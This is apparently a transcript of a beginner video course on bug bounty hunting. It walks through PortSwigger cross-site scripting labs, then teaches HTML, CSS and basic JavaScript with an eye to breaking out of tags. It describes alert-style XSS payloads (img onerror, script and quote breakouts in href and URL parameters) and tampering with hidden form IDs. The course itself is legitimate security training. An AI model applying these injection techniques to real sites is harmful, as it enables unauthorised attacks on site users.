it's not new to you you will have seen it you can go ahead and try and find it on your own okay so how did you get along with that challenge so we can actually come in here this is the lab we're going to be working on we can open it up and we're going to be setting what we type in to the inner HTML which means what we are typing in and searching for is going to be saved on the client side which means it will try and render it this is what I set up when we looked at the very first examples on the application that I tried to give you examples I if you go back and look at it this says dangerously set inner HTML which is just inner HTML with the react framework and so this is going to be the exact same type of vulnerability that we have already witnessed at the beginning of this section on cross-site scripting so you can go ahead and open up the lab and we'll have our search bar and we're going to be doing essentially the same thing we did in the beginning where what we type in is going to be rendered on this page and so we can type in our image and then we'll do our source which is where it's going to look for the source you can actually type anything in here and so it's going to look for a file saved then this application with this name and it's not going to find it and so that's going to cause an error and what do we want to do on error we want to alert and then here you would put your proof of concept because we just want to prove that this works and you can type in xss or you can type in one or you can type in whatever you want and we will go ahead and close that off and we can search this and there is the alert for us and so with that that solves this lab and we are going to try one more and I'm going to show you kind of this is a little more towards the intermediate level of cross-site scripting but it's just a way for you to know more about cross-site scripting and if you come across it and you really think there is a cross-site scripting vulnerability in a website just how you can work through that and maybe do some more research on your own to try and exploit it okay this next Lab is going to be one that is going to give an example of what it looks like to start looking for cross-site scripting in a little more of an intermediate or Advanced way this is going to be probably the most common way that this is going to be found because you're going to have to inspect the element and know how to break out of the HTML or the string that you're stuck in in order to pull off JavaScript and run it within the application so we're actually going to go ahead and open up this one right here and it'll be over here it'll tell us what we need to do and we just need to break out of the JavaScript string and call the alert function so I went ahead and opened this up and the most common way to do something like this is type in something that you can remember what you typed or something really easy to find so we'll type in one two three four and we'll hit search and now what we'll do is inspect the element or you can view page Source we'll actually do that that'll be a lot easier to see so we'll view page source and then we find our one two three four five but this is not where we're going to be breaking out of this see this is a script tag the search term right here we searched for one two three four five and we have the closing script tag here so in order to close out of this we can actually put a script tag up here in our search query and it will close all this off this script tag will match this script tag and then we should be able to open up a new script tag and it will run in the order it'll run all of this in the order that it is laid out and then we should be able to put in our payload so we'll come back to our lab and what we should be able to do is close off the previous script tag so that will close this tag and everything before it will be inside that tag and then we should be able to come in here and type in our own payload and so we'll go script alert and we will just alert one and then we can close off our payload and look at it make sure it looks right and that should work and then we'll go ahead and search it and there is the alert which means we've solved the challenge and everything after that script tag will get rendered on the page because it doesn't have an opening tag if you're wondering why this showed up so we'll go ahead and we'll look at the page source and I'll show you the difference see here is where we closed off that script tag and then here we put in our payload and then because this script doesn't have an opening tag this just gets rendered on the page as plain HTML so if you are unfamiliar with programming this probably doesn't make a whole lot of sense to you but when it comes to cross-site scripting it's kind of going to be necessary to understand HTML and basic JavaScript in order to pull this off but the reason I included this in this beginner course is because cross-site scripting is one of the most common vulnerabilities and so I wanted you to be aware of it and maybe you can practice it and see if you can get better or if you want to before you take the intermediate course is go learn some basic HTML and some basic JavaScript it won't take long you can learn HTML in a week you can learn CSS which is how to make a website look pretty in a very short amount of time couple of days and then you can learn basic JavaScript probably in another week it doesn't take long it's pretty simple to learn and so I wanted to show you cross-site scripting I want you to be aware of it like look at how many cross-site scripting Labs exist on port swiger and I think they actually have yeah Dom vulnerabilities so even more cross-site scripting so there's a bunch a bunch of cross-site scripting it's really common but it does take some programming knowledge to solve and so with that I will see you in the next video hey thanks for stopping by my channel in this video we're going to cover everything I think that you need to know as you are starting your bug Bounty journey within the realm of HTML and JavaScript this is just an introductory course so if you find this video helpful please let me know if you'd like me to expand this course into a full HTML and JavaScript course for the purpose of a bug bounty hunting and ethical hacking my goal for you in this course is to Come Away with the ability to read HTML when you inspect the source code or you view the page Source I want you to be able to understand what's going on what are all the tags and the links that are within the HTML and I want you to be able to understand how it all fits together and so I'm going to walk you through how to actually write some HTML and then from there we're going to move on to view the CSS and how it organizes and beautifies the HTML and then after that I'm going to cover some very basic JavaScript my goal isn't to teach you how to code in JavaScript script but rather just be able to understand what the JavaScript is doing when you see it I want you to be able to recognize the variables the for Loops the while loops and what exactly the JavaScript is doing when you come across it so with that let's go ahead and jump into it okay so here we are at codepin dot IO we're going to be starting out with basic HTML and how to understand it so you can come over here and go to this web application and click Start coding and it will load up for us what we need you might have a display that looks something like this or this I like it all the way over here to the right so that way my actual web site will look similar to the way you would see it in an actual browser we can come over here and minimize this and we can minimize this because we're not going to be dealing with CSS or JavaScript just yet and basic HTML and tags I want to show how HTML tags look so HTML what is HTML it is the hypertext markup language and it's the language of the internet there's also XML which is another markup language but we're not going to deal with that just yet because we are on HTML so when you come to HTML you can make static websites they won't look very nice but you can make them and you can do this with just HTML and so let's just start coding along and you'll be able to understand it as we go so so let's say we're making a journal entry to a book or we're just making a table of contents you could start out with just a basic H1 and then you'll make another H1 only you're going to put a forward slash and we're going to close it out and then in here we can say this is a title and then it will render for us over here and we have this closing tag and this a closing tag is actually really important because let's say I had by me and as it loads this it's going to put all of this in here and it puts it all in Big Font and when we close this out like we already saw and the way you're supposed to do it will load it differently you can see the H1 makes the text really big and let's say we want to enclose this actually we'll enclose the me down here with an H2 just like this and you can see this has changed right here and you can see that it is smaller and if we make this let's say we want to make this an H4 you can see as the numbers go up the size of the font gets smaller so the H1 is for the top heading and everything gets smaller and then you also have a paragraph tag that looks like this and in here would be what you would consider a paragraph so you can just write in here something and then we can close this out just like this and you'll be able to see that it renders just the same and now we have this paragraph tag so you have headings and paragraphs and you can format the text and the style with the CSS which we will do later but right now I just want you to have a basic understanding of how HTML works and get to unders and be familiar with these tags you can actually go to a documentation website for such as w3schools and so for now I want you to get an understanding of these tags and you can go to w3schools and read the documentation about all the different tags and we're going to see quite a few different ones as we go along but these tags become really important for cross-site scripting and other vulnerabilities because we're going to have to learn how to break out of these tags in order to insert our own malicious code in the future okay so now that we are familiar with a closing tag there are some kinds of tags that do not require a closing tag and these are typically tags that do not have any input like these all take some kind of text that they render on the page there are some tags that are self-closing such as a brake tag and this tag does not take any text or input and what it does is it spaces out these gaps right here and there is also another tag called an HR tag and this will place a line underneath of the text this is usually done in like basic resume style HTML websites you won't really see a whole lot of this in actual web applications and if you do usually stuff like this is done with a border inside of CSS in a div but this is something to be aware of that there are self-closing tags within HTML and you will probably see these I want you to be familiar with all the different kinds of tags you are going to be seeing when you're looking through source code and you're looking for vulnerabilities as well as trying to figure out how to get a cross-site scripting to work and it is always helpful to be familiar with the tags because some tags may be blacklisted While others are not and they can be helpful in helping you break out of an HTML element in order to get a cross-site scripting to work and another thing to be aware of if you see something like we just saw with the HR and we see this pop up on the screen and we decide we want to add a size to it and we want to make it bigger or smaller and you can see this is running in pixels so if we do 39 that's going to be really big I meant to make it just nine you can see that our line shows up and I think you can also add a shadow but I don't remember how to do that with an HR tag if you ever see this and you're wondering wow I really like how how this looks I would like to be able to make a tag that looks just like this one on a web application you can inspect and you can actually just look to see exactly where it is at let me see if I can we'll grab this inspect and right here you see the HR size 3 and it's really important to be familiar with inspecting specific things because it's possible in the future that you're going to have an input field and you are able to search it renders within the HTML and you're going to need to be able to inspect to see where the word is within the HTML so that you know exactly what you need to do in order to break out of it to get your malicious code to run we'll get more into that in the future but for now let's continue with HTML and what it like what it looks like and becoming more familiar with it we're going to move on from here and we're actually going to install a text editor I'm going to have you install Visual Studio code if you're new or you can use whatever text editor you would like but I'm going to be using vs code so what we can do is come over here and we can just type in vs vs code just like this and you will come to this page right here you can click download mode and you can download it for whatever OS system you are using and you can go ahead and download it and then install it it's pretty simple to install and open up and when you are here you will want to make a new folder I'm just going to leave it we can barely see my folder over here I'm going to rename it as test app you can call yours whatever you would like and then we're going to open it up so we'll come over here click open go to desktops and I named it test app right here and I can open this and it will open over here just like this and we can open up a new file and say index.html and when we hit enter it's going to open up our index.html because we're in vs code right here is where you go to install plugins I'm just going to have you install one plugin right now and we're going to type in boilerplate I think you could just type in boil yes and it goes ahead and opens this up we want HTML boilerplate and you'll hit install right here I already have it installed and then we when we come back to our index.html if we just type in HTML we can go down to this 5 right here and hit enter and we'll be given the boilerplate and now you can delete this right here this is how we want to keep this so we can save this right here and a a helpful tip to render what we have going on in a browser we can just right click and we can just say we want to open with Google Chrome and it will open up a page for us like this I actually want to put that put this page over here so you can see it and if we just come over to our body right here and we just type in and let's make it in H1 and we'll just say hello world save this and if we come over here and refresh our page it will render for us our hello world so now that we know everything is working we're going to begin looking at a little more in-depth Advanced HTML that we will need to know in order to break out of our HTML to perform cross-site scripting and insert JavaScript so with that I'll see you in the next video alright so we have our own little web application running over here and now we're going to enter a little bit in here so instead of this H1 we can enter our name and we'll make like an entry that we would see into something kind of like a Wikipedia page so you have a name and then you're gonna want a title and the title is going to be what goes on up here like create a plan or a react app we're going to go ahead and name it and this actually goes inside the head tag and so we can open this up title I guess I probably shouldn't open that up because if I close it off I think it'll automatically close it for me and we can say Ryan's site and then we'll save it and then if you come over here and refresh this it should refresh for us we got your site and your name and you can add in a paragraph tag so we can say what do we want to say about ourselves right here inside this paragraph and we can say I am learning to become a hacker so this is true for all of us here and what we maybe we want to make this hacker right here we want it to be italicized and bold so we can come in here and we can say we want all of this to be emphasized and it closed that off there for us and we'll paste it over here and we'll save this and maybe we want the word hacker to be bold so we can come in here and say we want this to be strong and we can move this as well and now if we save this and refresh our page over here it has all become italicized I'm not sure why this didn't become a bold for me I believe that's supposed to be bold but that's okay if it doesn't work for us my goal right now is for you to be understanding that there are different tags and we can actually add in a Break Tag like say we want we decide we want this word hacker right here to be on the next line we can add in a break and we can refresh it and now we have it on the next line and maybe we decide after this that we want a line underneath everything and so we'll say we want the HR in here for the line break and if we refresh this we now have our line so we're starting to get a entry form here kind of like a Wikipedia page I actually should look at a Wikipedia page so I know what they actually look like but anyway my goal for us is to begin to understand these tags and we're going to look at a few more tags and then we're going to start looking at what goes inside these tags because sometimes you'll be inside of something that looks like this and you're going to have to figure out how to break out of this tag because your entry input will be saved inside of a source or inside of something within a tag and so we're going to learn more about inputs over here in just a little bit for now we're going to look at a few more tags that are going to be really common and you're going to see a lot when you look at page Source now that I'm about to close this out I actually see that I spelled the word strong wrong here so if we save that and now we come over here and we refresh our page it becomes bold for us there so inside of our HTML and our tags we will need to spell things correctly otherwise The Interpreter will not know what we're doing or how to translate it into the web page okay with that I will see you in the next video now I want us to look at lists and in the next video we're going to look at image tags which are going to be really important because they're a main way to get an xss to work and so those will be coming up but for now we have our little web app that looks like this and underneath the HR we're going to add in a list and the way to add in a list can be done with a UL and you just add in an li like this and now we're going to type into our list and we're going to go ahead and put in I have learned about tags and in our next one dang it and the python text editor you can hit Tab and it'll go past your tag for you and then you can go down to the next line so we'll add another list just like this and we're going to say I have learned about list and then we can say lastly next I will learn about image about image tags and now if we save this come over to our page and refresh it we have these bullet points just like this and if we want them to be numbers it's pretty simple you just would change this to an ol like so and I forgot to save it and now we can refresh the page and we have one two three so these are lists and tags you'll see these sometimes you'll be able to have inputs and in one of the really popular places to see something like this is inside of some kind of task manager or something you will see these in live programs or maybe in a penetration test where you are testing some kind of application that is supposed to help you schedule and you'll be able to input lists and things like this and maybe there will be some way for you to inject either over here or over here but these are the LI tags and this is the ol so when you see this in a page Source you now know what is going to be going on now we're going to move on to the image tag and we're going to pop our first cross-site scripting only we're going to use an alert because we're not going to be injecting it into anything but I want you to see how it works because you're going to see these image cross-site scriptings a lot in the future they are really popular if you can get one to store for the cross-site scripting to pop every single time the page loads so with that we will move on in the next video a few more things to go over and learn before we are ready to start practicing cross-eye scripting elsewhere and the first thing we need to cover is an image tag the image tag is going to be one that you're going to see a lot in ctfs and practicing cross-site scripting because it will automatically render on the page whenever it is loaded or if there's some kind of submit button for an on air to cause an event so with that we will just start out with a basic understanding of inserting an image so if you just type in IMG it should load for you you have this alt which is what's going to load if the source doesn't work so we can just say Ryan because I'm going to use my image and if we save this and we'll say the source is lost so obviously there's not going to be any Source if we come over here and we refresh the page we see Ryan and it tells us a little image is not found but if we go out to say Google and we type in who am I and we type in PhD security and then we go to images here I am right here and we can copy the image address right here make sure I'm trying to read those make sure that's right and if we paste this in here and then we save this huge link when we refresh our page our little browser that we have created right here is going to go out to this linked address that we have right here on YouTube to grab my image and it's going to Ping it and make sure that we have permission to load this image right here so if we save this and refresh you can see my image has popped up right there now I don't like where this is at so I'm going to delete this and that's one way to grab an image and you will probably see that in the future and you'll definitely see when images aren't loaded that's usually what's happening now I already got the photo over here same photo you will see this as well this is the most common way to load an image and it's also the most reliable way I actually want to put it underneath my name because it'll look better in our little Wiki page right here so if we do our same thing and we say image and the source is just ryan.png because it is already loaded right here for us and we save it we can put in the all would just say my name and we save it and we refresh it you see it moves up here and that is because it's grabbing the link right here now I think the most popular way to perform a cross-site scripting especially in ctfs that don't have any kind of black listing it's going to look just like this Source you just put some mumbo jump in there that's not going to work and then and all doesn't really matter what you're going to see is an on error and then it's going to do something and usually the do something is going to be alert and one and then save this refresh our page and you see the cross-site scripting pops right there for us and you'll see something like sometimes people will put in a one sometimes people will put in xss and sometimes you can just see a one two three save it we got too many closing brackets and on our page over here refresh we see this page says one two three and that is going to be probably the most common cross-site scripting that you're going to see in beginner ctfs and the reason you're going to see it done like that in the beginning is because this is really easy and your input isn't being stored anywhere we're going to get a little more complicated as we go along with the cross-site scripting this is how you're going to see images loaded in HTML and this is how you're going to see a lot of cross-site scriptings performed you're going to see this image payload all over the place so if we come back to our payloads look we have image image image and you always see this on air and here's an on click and you're just going to see a lot of these image tags here's another image tag and so you're going to want to be familiar with understanding the image tag and then how to perform the cross-site scripting with it as we go along things are going to get more interesting and a lot more fun to try and break out of I know cross-site scripting doesn't pay a lot of money usually but it is a lot of fun to break out of the HTML tags and bypass the bad characters so with that we're going to look at ahrefs and hyperlinks in the next section and then we're going to start looking at getting cross-site scripting to work for us and then after that we're going to start looking at cross-site scripting and breaking out of HTML tags so with that I will see you in the next video okay so we're here with our code for our very simple website that we have going on right here and so far we have just a static website with nothing really going on and I want to move on into ahrefs and we're going to build this inside of an anchor tag so right now if we refresh this page right here we're going to get our xss so we're going to go ahead and comment this out I think you can just click at the end of the line yes you can you can click at the end of the line and on a Mac you hit command forward slash or command question mark and it comments out the line there for us and below this we're going to add in our anchor tag which is just going to make us have a clickable link so we're going to go href which this is going to be the link that we are actually wanting to add to our website and we're going to just give something very basic like google.com so we can go HTTP s forward slash and then we go www.google.com and if we save this and then we come over here and refresh you will see our link when we add it in over here Google I forgot to add that text in and I forgot to save it so we'll save it refresh our page and now we have this link right here and if we open link in new tab we are taken to Google so this is really simple and you can actually I've actually been seeing these little anchor tags also inside of the source right here be come a place for cross-site scripting I'm not really sure why developers have been making it so your user input say there's like an input box or you can just come up here and you would do something like this and just add in a parameter of something equals and then xss or script right here I've been seeing at least twice in the last month that right there that xss would get stored either right here or right here and all we have to do is break out of these little links or the source or the ahref in order to get our cross-site scripting to work so we'll just pretend for now rather than actually build an input because that's going to require some JavaScript in order to get it to be saved inside of this link but one of the things you should always do and always check for is if you can add in a parameter right here like this or you're able to just insert something into like a text field and hit search like on a search bar on Amazon or Google and then you inspect the text like this you should always check to see if your information is getting stored in here like this cross-site scripting you should always come in here and look for the cross-site scripting or your keyword that you were able to put into the input so I want to just show you like how to break out of this for cross-site scripting let's say we're able to add a parameter and it adds it into this Google.com the most recent one that I saw it was actually appending what I put in as a parameter down inside of a page one it was like something like this page one equals and this was at the foot of the application so it would look to something like this right here and if we save this comment that out and then we come back over here and we refresh this it was down here at the bottom and it was like page one and within this page one it had my little cross-site scripting payload that I was adding in right here and so we'll pretend that is what we have going on is that we're able to add in a parameter and it's getting stored right here and we need to break out of this in order to get our cross-site scripting to work because if you just come in here and type in script alert and then you close this out nothing is going to happen and I'll show you we might even get an error we come over here we refresh it and nothing happens you click on it nothing happens we're not able to because what's going on right now is we're not breaking out of the current HTML and there's a couple of different ways to go about this and this is all going to be trial and error and sometimes when I come across something like this in the wild I'll just copy this and I will paste it into a text editor just like this because the colors are going to change when the payload is ready to work so you should be aware of copying this and bring it into a code sandbox or some kind of Text Editor to play around with it but I think this one is going to be pretty easy to break out of you just add in some quotations right here in order to close this out and then you can add a closing tag and now if we save this and we come over here and we refresh the page we get our cross-site scripting to work and they really are this easy to find in the wild especially if you're off the beaten path where pay loads have not been tested and people haven't been looking for cross-site scriptings like this the one that I found really was this simple all I had to do was come up here in to the URL and I just added in a random parameter so you can just add in for for the sake of example a CB like a cash Buster even though we're not doing web cache poisoning and then you can just add in a parameter of payload and then we would say equals and the way you would get this to store is you would type in our script that we put in just like this in order to close off this anchor tag and then we just add in our payload and so you'd go like this and you'd say script script spell it right script and then we would have alert and then we would close off our payload just like this and then you submit this this is how it worked for me and this right here was getting stored inside of the href just like this so that is one way to pull off a cross-site scripting inside of a anchor tag and sometimes you'll see these inside of something like this because if you're familiar with burp and you see the header tags and it sends a a referrer header showing where you came from in order to get to the next page it'll have in the previous website that you've come from and I actually came across a website that was storing the previous URL inside the HTML in a hidden input field and all I had to do was copy it and then basically do the exact same thing we were doing earlier and just add in our script just like this in order to get the alert to work so you can look out for these in a lot of different places such as an ink such as an href or inside of a source and just be aware that where you put things within the input may get stored randomly within the HTML and then all you have to do is be familiar with HTML such as closing off the quotes and then closing off the tag and then pulling off the cross-site scripting so with that we're going to move on and look at some more HTML in the next video alright so there's two things I really want to show you before we move on from HTML and we take just a second to look at CSS and then we move into JavaScript and that is hidden information as well as forms and so we'll just start out with forms and it will naturally lead into the hidden elements so a form is pretty much just what it sounds like it is one of those things that usually includes inputs and information that you're going to be taking in from the the user so usually within a form you'll have a class which we're actually not going to mess with until we get to the CSS and then you'll have some kind of action typically and this is going to take you somewhere and we're not going to mess with that really either and then we're going to also see a method which we're not going to mess with as well this is what would be sending the information to the server okay and now we're going to want to add in a label just like this and inside of this label we're going to delete that and we're just going to say your name so we have this your name right here so if we save it and we come over to our page and refresh you will see it pop up on our page and I added in this little HR so you could see the division of the information and right here is the your name so we have our label and now we want to take an input so what we will do is add in an input so we just say input just like this and it's going to be a type text and we're not going to mess with the ID or the name at this point and if we save this you're going to see just a box up here over here and so it says your name and then we have this text box we're going to end up adding a button as well so we will say we want a button and it's just going to say submit even though our button at this point is not going to do anything and we can save this and refresh and now we have your name with this text box and a submit button that does nothing and then lastly you're going to see within these forms is a password and you're going to see something like another input just like this and instead of the type text you're going to see a password and if you save this and we come back over to our page and we look at this actually we're going to go ahead and add in a break because we want this on a new line so we save this we refresh it and that's pretty ugly and you'll see we have these little hidden dots just like here this is to secure the password and you'll see these a lot on web applications but now they've started adding in this little eye over here for you to be able to see what you're typing in because if you know any HTML and CSS at all you know that you can just right click this and you can inspect and then you can come in here and just change this password to text and then look at it just like this and you can see the information that is being typed in here and this is why people when they use public computers should never save their password because if you use a public computer and you log in and you accidentally hit save password then the next user can come in here and repopulate the password and look at your email and password and have your information which would be very bad so don't use public computers to enter in literally any of your data that is important to you so there's one more thing I want to show you and that is the hidden option and so we're going to actually use a div here and I want to show you that you can just type in Hidden right here and usually this hidden will be something other than the actual word hidden there's other ways to hide elements within HTML but we're going to use hidden because it's really simple and then sometimes you'll see something like ID equals eight and then if we save this you I've never actually seen this in the wild only in ctfs so this is not going to be something you're probably going to encounter in the wild but you will probably see it in ctfs as I've seen it in several ctfs and you come over here and you refresh this page you can see that we have this div id8 and it's hidden and we can unhide this by just deleting the word hidden and now the ID shows up on the actual page and usually within ctfs this id8 will be within a form and you would just change this 8 to something else so you could come down here and say we're going to change the ID to 1 which would typically be an admin and then you would hit the submit form and it would change your ID to one that's usually how it'll work in ctfs I've never actually seen this in the wild but it is something to be aware of that you can change this hidden to anything you can just delete it and then you can change things within forms that have been hidden quite simply just by changing it so that is something else to be aware of within the world of HTML and CSS all right so we have a future edit here and I just want to say the reason that this would work in most ctfs is because if there is no JavaScript to it check the user ID input then when you hit the submit button it would go ahead and send it but in most cases there's going to be JavaScript to check such functions so a lot of times this is not going to work and we will cover this more in the future but for now I have seen this in ctfs where you can change an ID because there's no JavaScript checking to make sure that the user client side input is what it is supposed to be and the next video we're going to give just a quick look at CSS because we're not trying to be web app developers I'm not going to spend a lot of time on CSS just going to give you a quick overview so that you know what it is and when you see it you'll be able to recognize it and know that it really isn't anything important to you unless you are crazy good and you can pull off some kind of remote code execution through a CSS injection which can happen but is really Advanced so we're going to just look at some simple basic CSS so that you are aware of what it is and you are questioning when you see it inside of some source code I'll see you in the next video all right we're going to have a look at some CSS we're not going to spend a ton of time working on our little website here making it look nice for me I am not a designer and I don't understand web design and fashion or anything like that or color coordinating so in the world of web development this is for me the most difficult part is making a website look nice some people are just gifted as designers and I am not one of them so I'm just going to show you how CSS Works in two different ways I'm going to show you internal CSS and I'm going to show you external CSS so that way when you come across CSS you know what you are looking at and you're familiar with it I'm not going to actually show you how to design a web app because that is not my area of expertise and it's not my gifting if we want to do some internal styling we can just come in here and type in style and we can hit enter and then we have this H1 right here that has our name in it so we could just very easily just type in H1 and then we open a set of curly braces and then we can just type in color and then we can just type in aqua looks like a great color and then we close it off with our little colon there and we save it and we come over and refresh our page uh I see I didn't type in H1 typed in HR so we type in our H1 save it refresh and our color changes to blue and then maybe we want to change the word right here hacker there's another way you can go around doing internal styling and you can just come in here and say that you want a color and then we say we want pink and then we can save it this way and then if we refresh it our color works so there's several different ways you're going to see internal CSS and this right here is the most common this happens but it doesn't happen very often so when you're out in the wild you will see CSS function like this and you can also do a lot more with this we're not going to cover it so you could come in here to this H1 and you can type in something like padding and you can say padding left and then we could say like 200 pixels and then if we were to save this and come back over and refresh it you'll see that the name moved I'm not sure if there is a centered option let's check it out there is not so there's something called bootstraps that would really help you with your styling if you were trying to become an an actual developer but we're not going to spend a ton of time with that so you can do things like the padding left you could do a padding for the bottom if we wanted some space between our information here and you could say 100 pixels and you could save this and if you came over here and refresh it we'll get a padding over here so this is a little bit of styling and one thing to be familiar with is a lot of times things are going to be broken up into divs so you would have something like this right here you would have a div and we'll just copy this and cut and we can paste that right here and then we'll put another one we'll keep we'll put this right here and then we'll put one down here between our list that we have right here and then if we were to put something inside of here like we say this div we want to style it and we say style and then we want color and then we're going to make this entire color red it's going to be very bold and then we decided to make a different div and we wanted the entire color to be let's say we'll make this entire color pink and we save this and we refresh our page you're going to see that everything within those divs actually changes colors except this overwrites what was written inside the div so we can actually just go ahead and close this out right here and now if we come back and refresh you can see everything becomes red and pink within the specific div and so this is an introduction to internal CSS you can style it either up here like this or you can do some internal CSS and so the divs are going to be like you can within HTML and CSS you can think of everything as being inside little boxes and there's actually a Chrome extension it'll actually show you all of the boxes and it's called pesticide and you can install it if you want I'm not going to show it because the point of our course is not to learn how to be designers the point is for us to understand CSS well enough to know what we're looking at so that we can figure out how we can exploit web applications when we come across it so with that in the next video we're going to look at external CSS okay in this video we're going to look at an external style sheet and then I'm going to show you why this was important for you to will learn so the first thing we're going to do is we can just go ahead and delete these inline styles that we put in right here so that way we have our blank page like we did before and we can just go ahead and delete the style all together and then if we save this and go back to our page and refresh everything is back to how it was before now what we are going to do is come right here and we're going to add a folder just like this and we're going to call it CSS and then inside this folder we're going to add a new page and we're going to call it style.css and you can see our Visual Studio has recognized it as a style sheet come back to our index.html and inside of the head tag up here we can type in link and it tells us that it has this style sheet and we have the href2 and we want to link our CSS style sheet just like this and it auto saved for us so we can now save it and now you can come over to your style sheet and if we wanted to do like we did before we can type in the H1 and we can type in color and we can say red and if we save this and come back over to our page and refresh this our name is now red because that was the H1 we can do something like we did before with these divs and we can say we want to give the div a color so we could say div one we want to have a color of blue so we can come in here we put our period before the div and this is going to tell it that this is going to be our keyword and we can say color and we want blue just like this and then we'll make a div two so we'll say period div two I forgot this was div one and we can say we want the color of pink we'll go div one right here and we can say style div one and I just realized that this is supposed to say class because we've given it a class name over here and then if we give our second div a class of div two and we save this and we come over here and refresh it we now have the colors have changed within our div and our name color has changed so this would be a form of external CSS and I want to show you why it was important for you to know this and it's important to know that this file is named at CSS and then we called it style.css if we come back over here and we just check out this color palette and we inspect the page and then you come over here to the sources you can actually click on this CSS right here yours might not be all in line like this you can click on the CSS click on the style page and then click the pretty right here to make it look pretty and you can see just like this what they have done it is organized just like ours so this would be an anchor tag which would be clickable and they have red green blue not sure what the a is and then they have the text decoration none and so you can see their style sheet is called CSS just like ours and style.css and then it it is formatted exactly the same way and this would be an external style sheet and then if you come back to looking at the elements you can see the class right here the class names for how they decided to name their classes and organize what they look like based on the CSS so now when you come in here and you inspect a page and you come across a CSS file you'll know what you're looking at and you'll also be familiar with seeing class inside of the divs seeing these class names and that is going to wrap up for us the CSS internal and external I will see you in the next video okay we're going to be moving in to a section on JavaScript and so as we go through at JavaScript it will be helpful for you to have a great place to practice your JavaScript in a really easy place to practice JavaScript is within the Chrome developer tools so I would suggest if you do not have Chrome installed go ahead and install Chrome because we're going to be using it throughout the portion of our JavaScript course so an easy way to practice JavaScript is just come over to your web app that we have running within Chrome we can go to inspect and then we will go to two sources you are going to be on this page right here we're going to hit these two arrows right here and we're going to say Snippets and then we'll say new snippet and then you can just call this index.js which is the file name within your code you would have it named over here and then you can actually just type in your JavaScript right over here and then when you're done you can run it just like this by hitting play and it'll hit up an alert for us and then if we want to do something like a console.log and then we want to log something it will actually pop open the console for us right down here and it will tell us what we have logged so this is going to become more familiar with you as we are going along but this is where we're going to be practicing our JavaScript and if you're unfamiliar with JavaScript entirely JavaScript is the scripting language of the internet so if you were wanting to become a web application a penetration tester or a bug Bounty Hunter JavaScript is going to be something you're going to want to learn because it is the language of the internet it is what gives websites functionality so when you go to a web application and you see things moving around and stuff happening that is going to be thanks to JavaScript so JavaScript is going to be very important for us to learn and we're going to spend quite a significant amount of time learning this JavaScript and so a buckle up and get ready for JavaScript one thing that is important to know about JavaScript and really any scripting language is syntax so you saw me type in alert just like this and then we can type in the word hello and then if we close this off this is not going to work for us we're actually going to get an error and if we open up our console it tells us that we have an error right here the reason is because the these characters within this alert need to be within side quotations because this is considered a string so a JavaScript wants to interpret whatever's inside of here either as integers such as one two three and this will run for us and it will work because these are integers or you're going to need to have strings inside here so if we type in some characters we will need them inside of a string and now if we run this it will work for us so we have this alert right here what is this alert this alert is calling a function within a JavaScript and in the future we're going to make our own custom functions but for now all you need to know is this alert is a this alert is a function and it is going to pop up the string of characters that are put within here that are being passed within the function and then I believe we need this within Chrome developer tools to close off our alert and I guess we do not but typically when you close something off you will close it off with a semicolon just like this so it's best practice to go ahead and start putting it in there now as we are practicing so with that I will see you in the next lesson before we make it too far into our JavaScript lesson I think it's helpful to know there are several different types of data types and we've already saw this one right here with a string but if we pull open the console here which is really great it is going to be a very useful tool to us as we're learning our JavaScript we can type in something called type of just like this and then we can put whatever we want inside of our brackets right here and we can say we want to put in one two three and it tells us this is a number and if we put in a string right here like this we don't have to type anything in and it tells us this is a string and then we also have one other type of data type that will be really helpful to us especially when we're running while loops and that is true false and it will tell us this is a Boolean so you have strings integers and booleans and you're we're going to be using all of these as we move into our JavaScript and it will be helpful for you to remember these you're also going to see these within different exploit write-ups within the world of hacking and so it's important to know that you have integers strings and booleans because you will come across these in the future and if you ever do any kind of programming or you're writing up the code for your own exploits or modifying exploits you will need to know what is going on and what kind of data types you are dealing with so with that there is one more area of JavaScript that I want to cover before we start trying to write any kind of code or do any kind of exercises and that is variables so with that we will check those out in the next video okay so here we are with our variables and there's a couple different ways I want to show you how to use variables the very first thing I want to tell you about variables is that it stores some information for you a variable is going to store some kind of data that we can later come back and say we want this variable what information is within it and it will tell us the information that is in it so for example if I say VAR equals two plus three and then we have to name our variable and we'll just call it num so we have this VAR num equals two plus three we need to close off our JavaScript here to plus three there we go and get rid of that error and if we run this it's going to tell us that we have nothing happening because we need to console log this so we go console.log and we're going to log the number so this is our variable being passed through the console.l log function and if we run this we get the number five down here so this number contains the information two plus three which is going to be at 5 and the console.log just prints the variable down here for us so we have this right here and when we run it we get our number but how can we take information from the user and use it there is a function called The Prompt and if you're very familiar with cross-site scripting at this point then you have for sure seen this in cross-site scripting payloads a prompt is also another way to view a cross-site scripting instead of an alert and so you can say prompt and then we can pass in our information here that we want and we can say say what is your name question mark and we can close this off and if we run this it should give us this little alert here and we can say Ryan okay and then it prints down here for us but how do we get this information that we put in here we need a variable so if you want you can go ahead and pause this video and see if you can figure out how to store this prompt in a variable called name and then get it to console log down here what our name is or the information that we put into the prompt and you can go ahead and give this a try now okay this is a pretty simple challenge all we're going to do is change this to a VAR name equals what is being put in the prompt and then if we come down here we can console.log and then we'll put up our brackets and we'll say name just like this and now if we run this we're going to get a prompt and this time we're going to say Ryan J okay and it prints out for us Ryan J down here for us through our console log I'm actually not entirely sure if it will print anything if we don't put the console log it does not so the console log is necessary to be here for our name to be printed so we can try this again and we say name and it prints name for us now there is another way to go about this without the console log and we could type in like our cross-site scripting that we use we are familiar with and we can say hello and then we can pass in the name function so we should be able to type in hello plus name and if we run this and we say Ryan we get an alert saying hello Ryan so this is how an alert would work with a console log the space has to be put right here that was my problem on why I couldn't get that to space so we just say like that hello space and then name and so now it should alert hello Ryan just like that okay so you just need this space in here to get the space in the alert so this is a variable and a prompt and so I want you to get used to looking at these types of info these types of variables and information so just go ahead and play around and maybe do some simple math stored in a variable display in an alert maybe do a couple console logs before going on to the next video set away you're familiar with variables and how they work okay so in this video we're going to cover the while loop and in the next video we're going to cover the for Loop and I decided to start with the while loop because it is quite a bit easier to understand and we're going to just make a simple while loop and we're going to count to 100 so we can say I equals zero and then we'll say while I is less than or equal to 100 100 we want it to do something and we want to console.l log I so we'll go console log and then we'll say I so the way it prints the I for us and the next part is very important we'll say I plus plus and this will add 1 to I every time so the first time it runs it'll be 0 1 2 3 4 and so on until it reaches 100 and then it will stop if you do not have the I plus plus you'll probably freeze your computer and have to force restart so this is very important and so we can go ahead and run this and it prints out for us we have all of the numbers here for us starting with zero and so this is the while loop it runs a function or or whatever is inside of the while loop until it has reached the total destination and sometimes you can have a while loop running with taking user input and when the user input says to quit you can shut the while loop off but we're not going to go into that because I don't think it's something you need to know in order to be an 